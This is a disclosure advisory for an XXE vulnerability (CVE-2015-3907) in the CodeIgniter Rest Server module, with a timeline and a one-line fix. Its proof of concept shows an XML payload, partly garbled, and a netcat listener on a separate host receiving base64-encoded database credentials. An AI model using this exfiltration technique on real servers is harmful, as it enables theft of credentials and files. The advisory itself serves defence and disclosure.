HITCON Knowledge Base

HITCON Knowledge Base

Posts

CodeIgniter Rest Server Module XXE (CVE-2015-3907)

Details:

  • Name: Yu-Chi, Ding
  • Email: dingyuchi@gmail.com
  • Software Name: CodeIgniter Rest Server Module
  • Vendor Name: Chris Kacerguis
  • Vendor Website:https://github.com/chriskacerguis
  • Type of vulnerability: XML External Entity (XXE) Processing

Abstract:

CodeIgniter Rest Server is a fully RESTful server implementation for CodeIgniter using one library, one config file and one controller, and it’s a popular project at GITHUB that had 2000 or more stars.CodeIgniter Rest Server is vulnerable against XML External Entity (XXE) attacks, this affected the whole application and not only the examples described below.

Affected:

Vulnerable: https://github.com/chriskacerguis/codeigniter-restserver

Technical Description:

Since all of the XML parsing functionality that PHP offers is based on the libxml libraries, the libxml_disable_entity_loader function tells the underlying libxml parsing to not try to interpret the values of the entities in the incoming XML and leave the entity references intact.

When user POST the XML formats parameter to CodeIgniter Rest Server, the parameter is not properly sanitized before being used in a call to the “simplexml_load_string()” function. This can be exploited to carry out XML External Entity (XXE) attacks.

For example:

POST /api/login HTTP/1.1 Host: 172.20.0.9 Accept: application/json Accept-Language: zh-tw,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8" ?>     %remote;   %all; ]>   name &send;

eval.xml “>  

Using netcat to listen for TCP connections on port 4444 at 172.20.0.11, then use base64 decoder to get mysql username and password.

root@172.20.0.11:~# nc -vv -l -p 4444

Listening on [0.0.0.0] (family 0, port 4444) Connection from [172.20.0.9] port 4444 [tcp/*] accepted (family 2, sport 13368)

GET /?file=PD9waHANCmRlZmluZWQoJ0JBU0VQQVRIJykgT1IgZXhpdCgnTm8gZGlyZWN0IHNjcmlwdCBhY2Nlc3MgYWxsb3dlZCcpOw0KDQokYWN0aXZlX2dyb3VwID0gJ2RlZmF1bHQnOw0KJHF1ZXJ5X2J1aWxkZXIgPSBUUlVFOw0KDQokZGJbJ2RlZmF1bHQnXSA9IGFycmF5KA0KCSdkc24nCT0+ICcnLA0KCSdob3N0bmFtZScgPT4gJ2xvY2FsaG9zdCcsDQoJJ3VzZXJuYW1lJyA9PiAncm9vdCcsDQoJJ3Bhc3N3b3JkJyA9PiAncm9vdCcsDQoJJ2RhdGFiYXNlJyA9PiAnZXhhbXBsZScsDQoJJ2RiZHJpdmVyJyA9PiAnbXlzcWxpJywNCgknZGJwcmVmaXgnID0+ICcnLA0KCSdwY29ubmVjdCcgPT4gRkFMU0UsDQoJJ2RiX2RlYnVnJyA9PiBUUlVFLA0KCSdjYWNoZV9vbicgPT4gRkFMU0UsDQoJJ2NhY2hlZGlyJyA9PiAnJywNCgknY2hhcl9zZXQnID0+ICd1dGY4JywNCgknZGJjb2xsYXQnID0+ICd1dGY4X2dlbmVyYWxfY2knLA0KCSdzd2FwX3ByZScgPT4gJycsDQoJJ2VuY3J5cHQnID0+IEZBTFNFLA0KCSdjb21wcmVzcycgPT4gRkFMU0UsDQoJJ3N0cmljdG9uJyA9PiBGQUxTRSwNCgknZmFpbG92ZXInID0+IGFycmF5KCksDQoJJ3NhdmVfcXVlcmllcycgPT4gVFJVRQ0KKTsNCg== HTTP/1.0

Host: 172.20.0.9:4444

Solution:

Add libxml_disable_entity_loader function to /application/libraries/REST_Controller.php

public function __construct($config = ‘rest’)    {           parent::__construct();   // disable XML Entity   libxml_disable_entity_loader(true);

Timeline:

2015-05-25: Discovered vulnerability. 2015-06-01: Vendor notification.

2015-06-02: Vendor response.

2015-06-10: Vendor fix.

2015-08-29: Public disclosure.

Comments powered by Disqus